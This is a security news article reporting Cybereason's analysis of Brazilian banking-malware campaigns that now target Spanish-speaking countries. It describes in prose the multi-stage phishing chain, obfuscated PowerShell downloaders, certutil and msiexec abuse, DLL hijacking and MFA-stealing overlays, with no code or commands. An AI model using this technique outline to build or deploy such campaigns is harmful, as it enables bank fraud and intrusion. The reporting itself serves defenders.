Security Experts:

Brazilian Financial Malware Spreads Beyond National Boundaries

Brazilian Actors Expand Financial Malware Campaigns to Attack Spanish-Speaking Countries

A detailed analysis from security researchers shows how Brazilian financial malware is spreading beyond national boundaries to attack banks in Spanish-speaking countries through South and Latin America, and Portugal and Spain in Europe. 

Brazilian hackers are often overshadowed in the media by news about Russian, Chinese, Iranian and North Korean hackers -- but new research from Cybereason suggests growing technical expertise and aspiration stemming from Brazil.

Assaf Dahan, Sr. Director, head of threat hunting at Cybereason, and Cybereason security analyst Joakim Kandefelt, have tracked and analyzed recent campaigns, and have discovered a multi-stage stealthy financial malware campaign that flies under the radar and is difficult to detect (Cybereason used AI-based behavioral detection). The research has now been published.

They also discovered that the campaign is not limited to attacking banks in Portuguese-speaking Brazil, but has widely spread to Spanish-speaking countries. "These countries," note the researchers, "include Argentina, Bolivia, Chile, Venezuela and Spain. Cybereason found earlier samples of Brazilian malware targeting more countries, such as Mexico, Portugal, Colombia and other Latin American countries. 

The campaign starts with social engineering and ends with the delivery of a RAT. The RAT seems to be an adaptation of the Delphi_Remote_Access_PC RAT available on GitHub. The GitHub code has no functionality directly related to malware, and Cybereason believes it has been repurposed by Brazilian cybercriminals for their own use.

The campaign uses a multi-stage infection methodology. While this is not a new approach, it remains effective at avoiding detection. It starts with a phishing email, often masquerading as a legitimate business invoice, or a spoofed VIVO email (Brazil's largest telecoms company). This contains a shortened URL or an attachment that fetches a first stage downloader. If an attachment is included, it is usually a PDF file that fires a request to the shortened URL once it is clicked anywhere. 

This first-stage downloader includes another shortened URL designed to fetch the second stage downloader from a web hosting service such as GitHub, Pastebin, AWS or Dropbox.

The second stage downloader, often masquerading as a Flash or Java update, is usually an obfuscated PowerShell script that fetches the main payload. It sometimes includes functionality designed to create persistence and perform anti-analysis checks. One example supplied by the researchers is described as "a PowerShell script that checks for an existing infection, drops a batch file that checks for values in the registry, drops a .lnk file that points to the aforementioned batch file for persistence and fetches a secondary xor-encrypted payload from the same remote server."

The final payload that steals online banking data from the targeted banks found in the malware configuration is again downloaded from legitimate hosting services. The configuration is either embedded in the payload from the legitimate services, or fetched from a C&C server.

This chained delivery method, using legitimate URL shorteners and web services, makes it difficult to detect a serious anomaly in the victim's network traffic. But the whole process makes widespread use of stealth techniques. For example, many of the first stage payloads comprise an obfuscated script or set of obfuscated commands. 

One example provided by the researchers "uses an obfuscation that gradually builds up its payload." They believe the obfuscation method is adopted from Daniel Bohannon's Invoke-Obfuscation project. "Once PowerShell is executed, the actual downloader payload does not appear in the process' command-line arguments."

The criminals also use Microsoft-signed applications, usually described as living-off-the-land, to further disguise their activities. In one example, a .lnk file spoofed an Internet Explorer shortcut. Once executed, a secondary payload was downloaded and executed using Microsoft's msiexec.

In another example, a .lnk file used Microsoft's Certutil to decode a base64 payload that was itself further obfuscated with carets inserted between almost every other character. Once decoded and deobfuscated, the command downloaded a secondary payload. 

The ultimate malware is usually fairly common Brazilian malware known as Banload, Banbra, Bancos, Delf and Spy/Banker.

"Brazilian financial malware," warns the report, "is known for its effectiveness in overcoming multi-factor authentication (MFA), by implementing sophisticated social-engineering tricks to extract SMS codes and other security tokens information, using overlay screens."

The primary malware is executed by a variety of methods. This includes DLL-hijacking techniques "against trusted security vendors, including Avira and McAfee, and trusted technology companies like VMware, NVIDIA, HP, Realtek and Adobe." However, this relatively common method has been evolved by the Brazilian hackers -- splitting the malware payload into two components. One would be a fake DLL that loads encrypted malware into memory, decrypts and executes it. 

The malware payload, however, cannot run without the separate loader. This codependency between the loader and the encrypted payload makes the detection and analysis of the malware harder.

The infections don't end with the financial malware. Cybereason found additional post-infection on compromised machines. "In addition to the banking Trojans," write the researchers, "we found that the same campaigns were distributing cryptocurrency miners, infostealers and malware that targets Microsoft Outlook. Malware that targets Outlook is a particular concern since it poses a major risk to organizations worldwide."

The Cybereason research demonstrates the extent to which Brazilian hackers try to hide their activity. It also demonstrates that existing financial malware campaigns have expanded their targets from Portuguese speaking Brazil to multiple Spanish speaking countries. This research focuses on specific banking campaigns targeting Portuguese and Spanish speakers, but "it is safe to assume," Assaf Dahan told SecurityWeek, "that there are other Brazilian threat actors targeting other countries as well."

Boston, MA-based Cybereason raised $100 million in Series D funding from SoftBank Corp in June 2017; bringing the total raised to $188.6 million. 

Related: Honeypot Highlights Danger to ICS Systems From Criminal Hackers

Related: Targeted FlokiBot Attacks Hit PoS Systems in Brazil 

Related: PowerShell-Abusing Banking Trojan Goes to Brazil 

view counter
Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.